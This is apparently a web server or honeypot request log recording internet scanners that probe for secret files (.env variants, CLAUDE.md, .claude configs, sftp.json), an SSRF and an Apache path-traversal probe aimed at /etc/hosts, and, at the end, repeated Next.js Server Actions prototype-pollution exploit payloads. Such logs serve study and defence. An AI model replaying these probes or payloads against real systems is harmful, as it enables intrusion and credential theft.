Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53912
Path: /main.py
URL: /main.py
Method: GET
[2026-04-02 11:18:02] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53902
Path: /.env.local
URL: /.env.local
Method: GET
[2026-04-02 11:17:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:57452
Path: /.env.production
URL: /.env.production
Method: GET
[2026-04-02 11:17:57] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:57450
Path: /.claude/claude.json
URL: /.claude/claude.json
Method: GET
[2026-04-02 11:17:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:57434
Path: /phpinfo.php
URL: /phpinfo.php
Method: GET
[2026-04-02 11:17:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:51196
Path: /server.js
URL: /server.js
Method: GET
[2026-04-02 11:17:47] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:51188
Path: /.env
URL: /.env
Method: GET
[2026-04-02 11:17:45] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:51186
Query: url=file:///etc/hosts
Path: /api/geojson
URL: /api/geojson?url=file:///etc/hosts
Method: GET
[2026-04-02 11:17:42] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:51174
Path: /CLAUDE.md
URL: /CLAUDE.md
Method: GET
[2026-04-02 11:17:41] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:42842
Path: /Claude.md
URL: /Claude.md
Method: GET
[2026-04-02 11:17:37] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:42834
Path: /.claude/claude.config.js
URL: /.claude/claude.config.js
Method: GET
[2026-04-02 11:17:34] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:42826
Path: /.vscode/sftp.json
URL: /.vscode/sftp.json
Method: GET
[2026-04-02 11:17:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49970
Path: /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
URL: /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
Method: GET
[2026-04-02 11:17:28] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49958
Path: /main.js
URL: /main.js
Method: GET
[2026-04-02 11:17:25] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49948
Path: /claude.md
URL: /claude.md
Method: GET
[2026-04-02 11:17:23] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49944
Path: /.config
URL: /.config
Method: GET
[2026-04-02 11:17:20] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:41280
Path: /.secret
URL: /.secret
Method: GET
[2026-04-02 11:17:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:41264
Path: /.env.old
URL: /.env.old
Method: GET
[2026-04-02 11:17:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:41248
Path: /.env.save
URL: /.env.save
Method: GET
[2026-04-02 11:17:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:39382
Path: /docker-compose.yaml
URL: /docker-compose.yaml
Method: GET
[2026-04-02 11:17:09] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:39370
Path: /api/v1/status
URL: /api/v1/status
Method: GET
[2026-04-02 11:17:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:39358
Path: /main.go
URL: /main.go
Method: GET
[2026-04-02 11:17:03] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:39350
Path: /.DS_Store
URL: /.DS_Store
Method: GET
[2026-04-02 11:17:00] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:50884
Path: /cgi-bin/../../../../../../../../../etc/hosts
URL: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
Method: GET
[2026-04-02 11:16:57] === HTTP Request ===
[2026-04-02 11:16:55] Main page accessed - IP: 168.100.9.75:50870
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 168.100.9.75:50870
Path: /
URL: /
Method: GET
[2026-04-02 11:16:55] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:38602
Path: /jars
URL: /jars
Method: GET
[2026-04-02 10:17:22] === HTTP Request ===
[2026-04-02 10:01:16] Main page accessed - IP: 35.241.150.107:55910
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.241.150.107:55910
Path: /
URL: /
Method: GET
[2026-04-02 10:01:16] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.222:59119
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-02 09:02:01] === HTTP Request ===
[2026-04-02 09:02:01] Main page accessed - IP: 104.152.52.222:54289
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.222:54289
Path: /
URL: /
Method: GET
[2026-04-02 09:02:01] === HTTP Request ===
[2026-04-02 08:34:34] Main page accessed - IP: 172.104.11.34:31276
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.104.11.34:31276
Path: /
URL: /
Method: GET
[2026-04-02 08:34:34] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:63790
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-02 08:33:28] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55720
Path: /.env
URL: /.env
Method: GET
[2026-04-02 07:56:57] === HTTP Request ===
[2026-04-02 07:42:30] Main page accessed - IP: 147.185.132.85:56410
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept: */*
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.85:56410
Path: /
URL: /
Method: GET
[2026-04-02 07:42:30] === HTTP Request ===
[2026-04-02 07:38:23] Main page accessed - IP: 172.236.228.193:32990
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.228.193:32990
Path: /
URL: /
Method: GET
[2026-04-02 07:38:23] === HTTP Request ===
[2026-04-02 06:33:41] Main page accessed - IP: 66.228.62.150:51852
===================
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 66.228.62.150:51852
Path: /
URL: /
Method: GET
[2026-04-02 06:33:41] === HTTP Request ===
===================
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.41:55915
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-04-02 05:41:13] === HTTP Request ===
[2026-04-02 05:41:07] Main page accessed - IP: 64.62.156.40:16953
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.40:16953
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-04-02 05:41:07] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.39:35651
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-02 05:40:20] === HTTP Request ===
[2026-04-02 05:39:49] Main page accessed - IP: 64.62.156.38:55110
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.38:55110
Path: /
URL: /
Method: GET
[2026-04-02 05:39:49] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.186:64992
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-02 05:38:01] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.186:64980
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-02 05:37:54] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.186.186:64976
Path: *
URL: *
Method: PRI
[2026-04-02 05:37:54] === HTTP Request ===
[2026-04-02 05:37:54] Main page accessed - IP: 66.132.186.186:64948
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.186:64948
Path: /
URL: /
Method: GET
[2026-04-02 05:37:54] === HTTP Request ===
[2026-04-02 04:36:35] Main page accessed - IP: 45.79.115.134:40951
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.79.115.134:40951
Path: /
URL: /
Method: GET
[2026-04-02 04:36:35] === HTTP Request ===
[2026-04-02 03:50:43] Main page accessed - IP: 147.185.132.51:61330
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.51:61330
Path: /
URL: /
Method: GET
[2026-04-02 03:50:43] === HTTP Request ===
[2026-04-02 03:38:10] Main page accessed - IP: 176.65.149.45:55934
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:55934
Path: /
URL: /
Method: GET
[2026-04-02 03:38:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:42022
Path: /jars
URL: /jars
Method: GET
[2026-04-02 02:34:03] === HTTP Request ===
===================
Accept-Encoding: gzip
Connection: close
User-Agent: ProxyPool-Scanner/2.0
Headers:
Protocol: HTTP/1.1
Host: httpbin.org
RemoteAddr: 87.121.84.172:56680
Path: /ip
URL: http://httpbin.org/ip
Method: GET
[2026-04-02 02:12:34] === HTTP Request ===
[2026-04-02 01:46:26] Login page accessed - IP: 193.142.146.230:39982
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.142.146.230:39982
Path: /login
URL: /login
Method: GET
[2026-04-02 01:46:26] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:9056
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-01 22:34:22] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.39.211:39408
Path: /.well-known/robots.txt
URL: /.well-known/robots.txt
Method: GET
[2026-04-01 21:56:57] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.39.211:39402
Path: /favicon
URL: /favicon
Method: GET
[2026-04-01 21:56:57] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.39.211:39376
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-01 21:56:56] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.39.211:39394
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-04-01 21:56:56] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.39.211:39382
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-01 21:56:56] === HTTP Request ===
[2026-04-01 21:56:55] Main page accessed - IP: 167.71.39.211:39374
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.39.211:39374
Path: /
URL: /
Method: GET
[2026-04-01 21:56:55] === HTTP Request ===
===================
Upgrade-Insecure-Requests: 1
Referer: http://95.143.191.38:8081/
Accept-Language: zh-CHS,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Microsoft Edge";v="122", "Chromium";v="122", "Not:A-Brand";v="99"
Pragma: no-cache
Cache-Control: no-cache
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:143.0) Gecko/20100101 Firefox/143.0
Accept-Encoding: gzip
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.131.155.111:45196
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-01 21:32:02] === HTTP Request ===
[2026-04-01 21:31:58] Main page accessed - IP: 45.82.78.102:39654
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.5.8 Chrome/120.0.6099.283 Electron/28.2.3 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.82.78.102:39654
Path: /
URL: /
Method: GET
[2026-04-01 21:31:58] === HTTP Request ===
===================
X-Forwarded-For: 66.249.68.133
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42056
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-01 19:56:42] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-For: 74.7.241.183
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42520
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-01 17:04:31] === HTTP Request ===
[2026-04-01 17:01:31] Main page accessed - IP: 178.83.200.2:60000
===================
Accept: */*
User-Agent: Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975U1 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 178.83.200.2:60000
Path: /
URL: /
Method: GET
[2026-04-01 17:01:31] === HTTP Request ===
===================
------WebKitFormBoundaryx1358604341636--
------WebKitFormBoundaryx1358604341636
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1358604341636
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 209171+true+6495185;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1358604341636
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_1358604341636
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1358604341636
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:49772
Path: /api/route
URL: /api/route
Method: POST
[2026-04-01 14:43:44] === HTTP Request ===
===================
------WebKitFormBoundaryx27538403531--
------WebKitFormBoundaryx27538403531
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx27538403531
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 22474+true+1225345;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx27538403531
Accept-Encoding: gzip, deflate
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_27538403531
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx27538403531
Next-Action: x
Connection: close
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:49770
Path: /app
URL: /app
Method: POST
[2026-04-01 14:43:44] === HTTP Request ===
===================
------WebKitFormBoundaryx1378067564711--
------WebKitFormBoundaryx1378067564711
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1378067564711
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 314185+true+4386166;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1378067564711
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1378067564711
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1378067564711
Next-Action: x
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:44122
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-01 14:43:43] === HTTP Request ===
===================
------WebKitFormBoundaryx1879883891913--
------WebKitFormBoundaryx1879883891913
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1879883891913
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 285688+true+6580199;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1879883891913
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1879883891913
Accept-Encoding: gzip, deflate
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1879883891913
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:44120
Path: /api
URL: /api
Method: POST
[2026-04-01 14:43:43] === HTTP Request ===
===================
------WebKitFormBoundaryx1693702846969--
------WebKitFormBoundaryx1693702846969
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1693702846969
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 218118+true+7765076;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1693702846969
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1693702846969
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1693702846969
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:44118
Path: /_next
URL: /_next
Method: POST
[2026-04-01 14:43:42] === HTTP Request ===
[2026-04-01 14:43:41] Main page accessed - IP: 45.205.1.26:44102
===================
------WebKitFormBoundaryx1232322839408--
------WebKitFormBoundaryx1232322839408
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1232322839408
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 175381+true+7026547;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1232322839408
Next-Action: x
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_1232322839408
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1232322839408
